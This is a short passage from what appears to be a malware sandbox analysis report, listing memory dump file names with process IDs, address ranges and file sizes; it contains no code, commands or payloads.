                                                    104KB

                                                  • memory/1748-290-0x00007FF9E3A00000-0x00007FF9E3A2D000-memory.dmp

                                                    Filesize

                                                    180KB

                                                  • memory/1748-289-0x00007FF9E7980000-0x00007FF9E798F000-memory.dmp

                                                    Filesize

                                                    60KB

                                                  • memory/3040-96-0x0000019619DB0000-0x0000019619DD2000-memory.dmp

                                                    Filesize

                                                    136KB

                                                  • memory/4188-166-0x00000195687E0000-0x00000195687E8000-memory.dmp

                                                    Filesize

                                                    32KB